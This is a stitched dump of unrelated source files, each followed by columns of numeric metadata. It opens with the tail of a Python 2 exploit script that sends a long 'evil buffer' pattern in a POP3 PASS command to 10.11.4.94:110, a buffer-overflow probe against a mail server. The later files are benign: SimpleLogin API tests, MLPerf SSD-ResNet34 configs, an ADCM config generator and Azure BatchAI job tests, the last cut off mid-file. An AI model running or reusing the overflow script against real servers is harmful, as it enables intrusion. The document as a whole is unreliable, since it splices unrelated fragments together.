l3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9"
try:
print "\nSending evil buffer..."
s.connect(('10.11.4.94',110))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not connect to POP3!"
| 171.5
| 2,711
| 0.949789
| 60
| 3,087
| 48.833333
| 0.65
| 0.008191
| 0.006143
| 0.008874
| 0.012287
| 0.012287
| 0
| 0
| 0
| 0
| 0
| 0.306848
| 0.025591
| 3,087
| 17
| 2,712
| 181.588235
| 0.667221
| 0.011338
| 0
| 0.153846
| 0
| 0
| 0.916066
| 0.885246
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0.076923
| 0.076923
| null | null | 0.230769
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
539a21d3c4b2014e9b4ca2d9ba47360d77824b92
| 5,861
|
py
|
Python
|
tests/api/test_alias_options.py
|
itsmechlark/simple-login-app
|
0121806301493615c052bfe6b254abc780824a99
|
[
"MIT"
] | 1
|
2020-11-21T11:18:21.000Z
|
2020-11-21T11:18:21.000Z
|
tests/api/test_alias_options.py
|
GanpatiRathia/app
|
f274bac053ce56fbbad0d87d0e57fec4eaae90ac
|
[
"MIT"
] | 1
|
2021-02-08T21:04:06.000Z
|
2021-02-08T21:04:06.000Z
|
tests/api/test_alias_options.py
|
itsmechlark/simple-login-app
|
0121806301493615c052bfe6b254abc780824a99
|
[
"MIT"
] | null | null | null |
from flask import url_for
from app.extensions import db
from app.models import User, ApiKey, AliasUsedOn, Alias
def test_different_scenarios(flask_client):
user = User.create(
email="a@b.c", password="password", name="Test User", activated=True
)
db.session.commit()
# create api_key
api_key = ApiKey.create(user.id, "for test")
db.session.commit()
# <<< without hostname >>>
r = flask_client.get(
url_for("api.options"), headers={"Authentication": api_key.code}
)
# {
# "can_create_custom": True,
# "custom": {"suffixes": ["azdwbw@sl.local"], "suggestion": ""},
# "existing": ["cat_cat_cat@sl.local"],
# }
assert r.status_code == 200
assert r.json["can_create_custom"]
assert len(r.json["existing"]) == 1
assert len(r.json["custom"]["suffixes"]) == 4
assert r.json["custom"]["suggestion"] == "" # no hostname => no suggestion
# <<< with hostname >>>
r = flask_client.get(
url_for("api.options", hostname="www.test.com"),
headers={"Authentication": api_key.code},
)
assert r.json["custom"]["suggestion"] == "test"
# <<< with recommendation >>>
alias = Alias.create_new(user, prefix="test")
db.session.commit()
AliasUsedOn.create(alias_id=alias.id, hostname="www.test.com", user_id=user.id)
db.session.commit()
r = flask_client.get(
url_for("api.options", hostname="www.test.com"),
headers={"Authentication": api_key.code},
)
assert r.json["recommendation"]["alias"] == alias.email
assert r.json["recommendation"]["hostname"] == "www.test.com"
def test_different_scenarios_v2(flask_client):
user = User.create(
email="a@b.c", password="password", name="Test User", activated=True
)
db.session.commit()
# create api_key
api_key = ApiKey.create(user.id, "for test")
db.session.commit()
# <<< without hostname >>>
r = flask_client.get(
url_for("api.options_v2"), headers={"Authentication": api_key.code}
)
assert r.status_code == 200
# {'can_create': True, 'existing': ['my-first-alias.chat@sl.local'], 'prefix_suggestion': '', 'suffixes': ['.meo@sl.local']}
assert r.json["can_create"]
assert len(r.json["existing"]) == 1
assert r.json["suffixes"]
assert r.json["prefix_suggestion"] == "" # no hostname => no suggestion
# <<< with hostname >>>
r = flask_client.get(
url_for("api.options_v2", hostname="www.test.com"),
headers={"Authentication": api_key.code},
)
assert r.json["prefix_suggestion"] == "test"
# <<< with recommendation >>>
alias = Alias.create_new(user, prefix="test")
db.session.commit()
AliasUsedOn.create(
alias_id=alias.id, hostname="www.test.com", user_id=alias.user_id
)
db.session.commit()
r = flask_client.get(
url_for("api.options_v2", hostname="www.test.com"),
headers={"Authentication": api_key.code},
)
assert r.json["recommendation"]["alias"] == alias.email
assert r.json["recommendation"]["hostname"] == "www.test.com"
def test_different_scenarios_v3(flask_client):
user = User.create(
email="a@b.c", password="password", name="Test User", activated=True
)
db.session.commit()
# create api_key
api_key = ApiKey.create(user.id, "for test")
db.session.commit()
# <<< without hostname >>>
r = flask_client.get(
url_for("api.options_v3"), headers={"Authentication": api_key.code}
)
assert r.status_code == 200
assert r.json["can_create"]
assert r.json["suffixes"]
assert r.json["prefix_suggestion"] == "" # no hostname => no suggestion
# <<< with hostname >>>
r = flask_client.get(
url_for("api.options_v3", hostname="www.test.com"),
headers={"Authentication": api_key.code},
)
assert r.json["prefix_suggestion"] == "test"
# <<< with recommendation >>>
alias = Alias.create_new(user, prefix="test")
db.session.commit()
AliasUsedOn.create(
alias_id=alias.id, hostname="www.test.com", user_id=alias.user_id
)
db.session.commit()
r = flask_client.get(
url_for("api.options_v3", hostname="www.test.com"),
headers={"Authentication": api_key.code},
)
assert r.json["recommendation"]["alias"] == alias.email
assert r.json["recommendation"]["hostname"] == "www.test.com"
def test_different_scenarios_v4(flask_client):
user = User.create(
email="a@b.c", password="password", name="Test User", activated=True
)
db.session.commit()
# create api_key
api_key = ApiKey.create(user.id, "for test")
db.session.commit()
# <<< without hostname >>>
r = flask_client.get(
url_for("api.options_v4"), headers={"Authentication": api_key.code}
)
assert r.status_code == 200
assert r.json["can_create"]
assert r.json["suffixes"]
assert r.json["prefix_suggestion"] == "" # no hostname => no suggestion
for (suffix, signed_suffix) in r.json["suffixes"]:
assert signed_suffix.startswith(suffix)
# <<< with hostname >>>
r = flask_client.get(
url_for("api.options_v4", hostname="www.test.com"),
headers={"Authentication": api_key.code},
)
assert r.json["prefix_suggestion"] == "test"
# <<< with recommendation >>>
alias = Alias.create_new(user, prefix="test")
db.session.commit()
AliasUsedOn.create(
alias_id=alias.id, hostname="www.test.com", user_id=alias.user_id
)
db.session.commit()
r = flask_client.get(
url_for("api.options_v4", hostname="www.test.com"),
headers={"Authentication": api_key.code},
)
assert r.json["recommendation"]["alias"] == alias.email
assert r.json["recommendation"]["hostname"] == "www.test.com"
| 30.21134
| 128
| 0.625661
| 738
| 5,861
| 4.823848
| 0.100271
| 0.05309
| 0.071067
| 0.080899
| 0.893539
| 0.878371
| 0.872753
| 0.858146
| 0.858146
| 0.858146
| 0
| 0.005794
| 0.204914
| 5,861
| 193
| 129
| 30.367876
| 0.758155
| 0.1266
| 0
| 0.713178
| 0
| 0
| 0.211705
| 0
| 0
| 0
| 0
| 0
| 0.24031
| 1
| 0.031008
| false
| 0.031008
| 0.023256
| 0
| 0.054264
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
539b21f72814c2bddd69a3b1f979ce7d8fb22d71
| 3,864
|
py
|
Python
|
closed/HPE/configs/ssd-resnet34/Server/__init__.py
|
ctuning/inference_results_v1.1
|
d9176eca28fcf6d7a05ccb97994362a76a1eb5ab
|
[
"Apache-2.0"
] | 12
|
2021-09-23T08:05:57.000Z
|
2022-03-21T03:52:11.000Z
|
closed/HPE/configs/ssd-resnet34/Server/__init__.py
|
ctuning/inference_results_v1.1
|
d9176eca28fcf6d7a05ccb97994362a76a1eb5ab
|
[
"Apache-2.0"
] | 11
|
2021-09-23T20:34:06.000Z
|
2022-01-22T07:58:02.000Z
|
closed/HPE/configs/ssd-resnet34/Server/__init__.py
|
ctuning/inference_results_v1.1
|
d9176eca28fcf6d7a05ccb97994362a76a1eb5ab
|
[
"Apache-2.0"
] | 16
|
2021-09-23T20:26:38.000Z
|
2022-03-09T12:59:56.000Z
|
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
sys.path.insert(0, os.getcwd())
from code.common.constants import Benchmark, Scenario
from code.common.system_list import System, Architecture, MIGConfiguration, MIGSlice
from configs.configuration import *
@ConfigRegistry.register(HarnessType.LWIS, AccuracyTarget.k_99, PowerSetting.MaxP)
class A100_SXM_80GBx4(BenchmarkConfiguration):
system = System("A100-SXM-80GB", Architecture.Ampere, 4)
active_sms = 100
gpu_copy_streams = 4
input_dtype = "int8"
input_format = "linear"
map_path = "data_maps/coco/val_map.txt"
precision = "int8"
tensor_path = "${PREPROCESSED_DATA_DIR}/coco/val2017/SSDResNet34/int8_linear"
use_deque_limit = True
use_graphs = False
deque_timeout_usec = 30000
gpu_batch_size = 8
gpu_inference_streams = 4
server_target_qps = 3700
start_from_device = False
use_cuda_thread_per_device = True
scenario = Scenario.Server
benchmark = Benchmark.SSDResNet34
@ConfigRegistry.register(HarnessType.Triton, AccuracyTarget.k_99, PowerSetting.MaxP)
class A100_SXM_80GBx4_Triton(BenchmarkConfiguration):
system = System("A100-SXM-80GB", Architecture.Ampere, 4)
active_sms = 100
gpu_copy_streams = 4
input_dtype = "int8"
input_format = "linear"
map_path = "data_maps/coco/val_map.txt"
precision = "int8"
tensor_path = "${PREPROCESSED_DATA_DIR}/coco/val2017/SSDResNet34/int8_linear"
use_deque_limit = True
use_graphs = False
deque_timeout_usec = 30000
gpu_batch_size = 8
gpu_inference_streams = 4
server_target_qps = 3550
use_cuda_thread_per_device = True
scenario = Scenario.Server
benchmark = Benchmark.SSDResNet34
instance_group_count = 4
use_triton = True
@ConfigRegistry.register(HarnessType.LWIS, AccuracyTarget.k_99, PowerSetting.MaxP)
class A100_SXM_80GBx8(BenchmarkConfiguration):
system = System("A100-SXM-80GB", Architecture.Ampere, 8)
active_sms = 100
gpu_copy_streams = 4
input_dtype = "int8"
input_format = "linear"
map_path = "data_maps/coco/val_map.txt"
precision = "int8"
tensor_path = "${PREPROCESSED_DATA_DIR}/coco/val2017/SSDResNet34/int8_linear"
use_deque_limit = True
use_graphs = False
deque_timeout_usec = 30000
gpu_batch_size = 8
gpu_inference_streams = 4
server_target_qps = 7650
start_from_device = False
use_cuda_thread_per_device = True
scenario = Scenario.Server
benchmark = Benchmark.SSDResNet34
@ConfigRegistry.register(HarnessType.Triton, AccuracyTarget.k_99, PowerSetting.MaxP)
class A100_SXM_80GBx8_Triton(BenchmarkConfiguration):
system = System("A100-SXM-80GB", Architecture.Ampere, 8)
active_sms = 100
gpu_copy_streams = 4
input_dtype = "int8"
input_format = "linear"
map_path = "data_maps/coco/val_map.txt"
precision = "int8"
tensor_path = "${PREPROCESSED_DATA_DIR}/coco/val2017/SSDResNet34/int8_linear"
use_deque_limit = True
use_graphs = False
deque_timeout_usec = 30000
gpu_batch_size = 8
gpu_inference_streams = 4
server_target_qps = 7100
use_cuda_thread_per_device = True
scenario = Scenario.Server
benchmark = Benchmark.SSDResNet34
instance_group_count = 4
use_triton = True
| 34.5
| 84
| 0.744306
| 509
| 3,864
| 5.388998
| 0.302554
| 0.020416
| 0.048122
| 0.042289
| 0.756836
| 0.756836
| 0.756836
| 0.756836
| 0.756836
| 0.743711
| 0
| 0.05374
| 0.176501
| 3,864
| 111
| 85
| 34.810811
| 0.808297
| 0.15088
| 0
| 0.840909
| 0
| 0
| 0.139578
| 0.10652
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.056818
| 0
| 0.943182
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
54faac912efb01f8259261196f20175f466d2d0c
| 5,938
|
py
|
Python
|
tests/functional/test_import_data/config_generator_positive.py
|
arenadata/adcm
|
a499caa30adc2a53e7b3f46c96a865f9e4079e4e
|
[
"Apache-2.0"
] | 16
|
2019-11-28T18:05:21.000Z
|
2021-12-08T18:09:18.000Z
|
tests/functional/test_import_data/config_generator_positive.py
|
arenadata/adcm
|
a499caa30adc2a53e7b3f46c96a865f9e4079e4e
|
[
"Apache-2.0"
] | 1,127
|
2019-11-29T08:57:25.000Z
|
2022-03-31T20:21:32.000Z
|
tests/functional/test_import_data/config_generator_positive.py
|
arenadata/adcm
|
a499caa30adc2a53e7b3f46c96a865f9e4079e4e
|
[
"Apache-2.0"
] | 10
|
2019-11-28T18:05:06.000Z
|
2022-01-13T06:16:40.000Z
|
import os
VARIABLES = [
("2.2", "3.0", 'max', 'min', "2.5"),
("2.2", "3.0", 'max', 'min_strict', "3.0"),
("2.2", "3.0", 'max_strict', 'min_strict', "2.5"),
("2.2", "3.0", 'max_strict', 'min', "2.2"),
]
TEMPLATE_EXPORT_CLUSTER = """
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
-
type: cluster
name: ADH
version: {}
config:
required:
type: integer
required: true
default: 15
str-key:
default: value
type: string
required: false
int_key:
type: integer
required: false
default: 150
export:
- required
- str-key
- int_key
- type: service
name: hadoop
version: 2.1
config:
core-site:
param1:
type: string
required: false
param2:
type: integer
required: false
quorum:
type: integer
default: 3
export:
- core-site
- quorum
"""
TEMPLATE_EXPORT_SERVICE = """
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
-
type: cluster
name: ADH
version: 1.4
config:
required:
type: integer
required: true
default: 15
str-key:
default: value
type: string
required: false
int_key:
type: integer
required: false
default: 150
export:
- required
- str-key
- int_key
- type: service
name: hadoop
version: {}
config:
core-site:
param1:
type: string
required: false
param2:
type: integer
required: false
quorum:
type: integer
default: 3
export:
- core-site
- quorum
"""
TEMPLATE_SERVICE = """
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
-
type: cluster
name: ADH
version: 1.6
import:
hadoop:
versions:
{2}: {1}
{3}: {0}
ADH:
versions:
min_strict: 0.1
max_strict: 4.0
- type: service
name: hadoop
version: 1.5
config:
core-site:
param1:
type: string
required: false
param2:
type: integer
required: false
quorum:
type: integer
default: 3
"""
TEMPLATE_CLUSTER = """
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
-
type: cluster
name: ADH
version: 1.4
import:
hadoop:
versions:
min_strict: 1.5
max_strict: 2.5
ADH:
versions:
{2}: {1}
{3}: {0}
- type: service
name: hadoop
version: 2.2
config:
core-site:
param1:
type: string
required: false
param2:
type: integer
required: false
quorum:
type: integer
default: 3
"""
for variable in VARIABLES:
d_name = f"service_import/{variable[2]}_{variable[3]}"
export_dir = d_name + "/export"
import_dir = d_name + "/import"
for d in d_name, export_dir, import_dir:
os.makedirs(d)
with open(f"{d_name}/import/config.yaml", "w+", encoding='utf_8') as f:
f.write(TEMPLATE_SERVICE.format(variable[0], variable[1], variable[2], variable[3]))
with open(f"{d_name}/export/config.yaml", "w+", encoding='utf_8') as f:
f.write(TEMPLATE_EXPORT_SERVICE.format(variable[4]))
for variable in VARIABLES:
d_name = f"cluster_import/{variable[2]}_{variable[3]}"
export_dir = d_name + "/export"
import_dir = d_name + "/import"
for d in d_name, export_dir, import_dir:
os.makedirs(d)
with open(f"{d_name}/import/config.yaml", "w+", encoding='utf_8') as f:
f.write(TEMPLATE_CLUSTER.format(variable[0], variable[1], variable[2], variable[3]))
with open(f"{d_name}/export/config.yaml", "w+", encoding='utf_8') as f:
f.write(TEMPLATE_EXPORT_CLUSTER.format(variable[4]))
| 25.594828
| 92
| 0.610475
| 787
| 5,938
| 4.540025
| 0.138501
| 0.06717
| 0.029107
| 0.035824
| 0.936468
| 0.930031
| 0.9096
| 0.881892
| 0.881892
| 0.881892
| 0
| 0.025532
| 0.287639
| 5,938
| 231
| 93
| 25.705628
| 0.819149
| 0
| 0
| 0.822967
| 0
| 0
| 0.819468
| 0.032334
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.052632
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0710e6b1764f62c6d5ea80b58293c14afbb04d14
| 16,144
|
py
|
Python
|
azure-mgmt-batchai/tests/test_mgmt_batchai_jobs.py
|
v-Ajnava/azure-sdk-for-python
|
a1f6f80eb5869c5b710e8bfb66146546697e2a6f
|
[
"MIT"
] | 4
|
2016-06-17T23:25:29.000Z
|
2022-03-30T22:37:45.000Z
|
azure-mgmt-batchai/tests/test_mgmt_batchai_jobs.py
|
v-Ajnava/azure-sdk-for-python
|
a1f6f80eb5869c5b710e8bfb66146546697e2a6f
|
[
"MIT"
] | 2
|
2016-09-30T21:40:24.000Z
|
2017-11-10T18:16:18.000Z
|
azure-mgmt-batchai/tests/test_mgmt_batchai_jobs.py
|
v-Ajnava/azure-sdk-for-python
|
a1f6f80eb5869c5b710e8bfb66146546697e2a6f
|
[
"MIT"
] | 3
|
2016-05-03T20:49:46.000Z
|
2017-10-05T21:05:27.000Z
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# pylint: disable=line-too-long
import re
from devtools_testutils import AzureMgmtTestCase, StorageAccountPreparer
from devtools_testutils import ResourceGroupPreparer
from msrestazure.azure_exceptions import CloudError
import azure.mgmt.batchai.models as models
from azure.mgmt.batchai import BatchAIManagementClient
from . import helpers
class JobTestCase(AzureMgmtTestCase):
def setUp(self):
super(JobTestCase, self).setUp()
self.client = self.create_mgmt_client(BatchAIManagementClient) # type: BatchAIManagementClient
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_job_creation_and_deletion(self, resource_group, location, cluster):
"""Tests simple scenario for a job - submit, check results, delete."""
job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'job', 1,
'echo hi | tee {0}/hi.txt'.format(helpers.JOB_OUTPUT_DIRECTORY_PATH_ENV),
container=models.ContainerSettings(models.ImageSourceRegistry('ubuntu')))
self.assertEqual(
helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name, helpers.MINUTE),
models.ExecutionState.succeeded)
# Check standard job output
helpers.assert_job_files_are(self, self.client, resource_group.name, job.name,
helpers.STANDARD_OUTPUT_DIRECTORY_ID,
{u'stdout.txt': u'hi\n', u'stderr.txt': u''})
# Check job's output
helpers.assert_job_files_are(self, self.client, resource_group.name, job.name,
helpers.JOB_OUTPUT_DIRECTORY_ID,
{u'hi.txt': u'hi\n'})
self.client.jobs.delete(resource_group.name, job.name).result()
self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_running_job_deletion(self, resource_group, location, cluster):
"""Tests deletion of a running job."""
job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'job', 1,
'sleep 600')
self.assertEqual(
helpers.wait_for_job_start_running(self.is_live, self.client, resource_group.name, job.name,
helpers.MINUTE),
models.ExecutionState.running)
self.client.jobs.delete(resource_group.name, job.name).result()
self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_running_job_termination(self, resource_group, location, cluster):
"""Tests termination of a running job."""
job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'longrunning', 1,
'sleep 600')
self.assertEqual(
helpers.wait_for_job_start_running(self.is_live, self.client, resource_group.name, job.name,
helpers.MINUTE),
models.ExecutionState.running)
self.client.jobs.terminate(resource_group.name, job.name).result()
self.assertEqual(
helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name, helpers.MINUTE),
models.ExecutionState.failed)
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer(target_nodes=0, wait=False)
def test_queued_job_termination(self, resource_group, location, cluster):
"""Tests termination of a job in queued state."""
# Create a job which will be in queued state because the cluster has no compute nodes.
job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'job', 1, 'true')
self.client.jobs.terminate(resource_group.name, job.name).result()
self.assertEqual(
helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name, helpers.MINUTE),
models.ExecutionState.failed)
self.client.jobs.delete(resource_group.name, job.name).result()
self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_completed_job_termination(self, resource_group, location, cluster):
"""Tests termination of completed job."""
job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'job', 1, 'true')
self.assertEqual(
helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name, helpers.MINUTE),
models.ExecutionState.succeeded)
# termination of completed job is NOP and must not change the execution state.
self.client.jobs.terminate(resource_group.name, job.name).result()
self.assertEqual(
helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name, helpers.MINUTE),
models.ExecutionState.succeeded)
self.client.jobs.delete(resource_group.name, job.name).result()
self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_failed_job_reporting(self, resource_group, location, cluster):
"""Tests if job failure is reported correctly."""
job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'job', 1,
'false')
self.assertEqual(
helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name,
helpers.MINUTE),
models.ExecutionState.failed)
job = self.client.jobs.get(resource_group.name, job.name)
self.assertEqual(job.execution_info.exit_code, 1)
self.assertEqual(len(job.execution_info.errors), 1)
self.assertEqual(job.execution_info.errors[0].code, 'JobFailed')
self.client.jobs.delete(resource_group.name, job.name).result()
self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_job_preparation_host(self, resource_group, location, cluster):
"""Tests job preparation execution for a job running on a host."""
# create a job with job preparation which populates input data in $AZ_BATCHAI_INPUT_INPUT/hi.txt
job = helpers.create_custom_job(
self.client, resource_group.name, location, cluster.id, 'job', 1,
'cat $AZ_BATCHAI_INPUT_INPUT/hi.txt',
'mkdir -p $AZ_BATCHAI_INPUT_INPUT && echo hello | tee $AZ_BATCHAI_INPUT_INPUT/hi.txt')
self.assertEqual(
helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name,
helpers.MINUTE),
models.ExecutionState.succeeded)
helpers.assert_job_files_are(self, self.client, resource_group.name, job.name, 'stdouterr',
{u'stdout.txt': u'hello\n',
u'stderr.txt': u'',
u'stdout-job_prep.txt': u'hello\n',
u'stderr-job_prep.txt': u''})
self.client.jobs.delete(resource_group.name, job.name).result()
self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_job_preparation_container(self, resource_group, location, cluster):
"""Tests job preparation execution for a job running in a container."""
# create a job with job preparation which populates input data in $AZ_BATCHAI_INPUT_INPUT/hi.txt
job = helpers.create_custom_job(
self.client, resource_group.name, location, cluster.id, 'job', 1,
'cat $AZ_BATCHAI_INPUT_INPUT/hi.txt',
'mkdir -p $AZ_BATCHAI_INPUT_INPUT && echo hello | tee $AZ_BATCHAI_INPUT_INPUT/hi.txt',
container=models.ContainerSettings(models.ImageSourceRegistry('ubuntu')))
self.assertEqual(
helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name,
helpers.MINUTE),
models.ExecutionState.succeeded)
helpers.assert_job_files_are(self, self.client, resource_group.name, job.name, 'stdouterr',
{u'stdout.txt': u'hello\n',
u'stderr.txt': u'',
u'stdout-job_prep.txt': u'hello\n',
u'stderr-job_prep.txt': u''})
self.client.jobs.delete(resource_group.name, job.name).result()
self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_job_host_preparation_failure_reporting(self, resource_group, location, cluster):
"""Tests if job preparation failure is reported correctly."""
# create a job with failing job preparation
job = helpers.create_custom_job(
self.client, resource_group.name, location, cluster.id, 'job', 1, 'true', 'false')
self.assertEqual(
helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name,
helpers.MINUTE),
models.ExecutionState.failed)
job = self.client.jobs.get(resource_group.name, job.name)
self.assertEqual(job.execution_info.exit_code, 1)
self.assertEqual(len(job.execution_info.errors), 1)
self.assertEqual(job.execution_info.errors[0].code, 'JobNodePreparationFailed')
print(job.serialize())
self.client.jobs.delete(resource_group.name, job.name).result()
self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
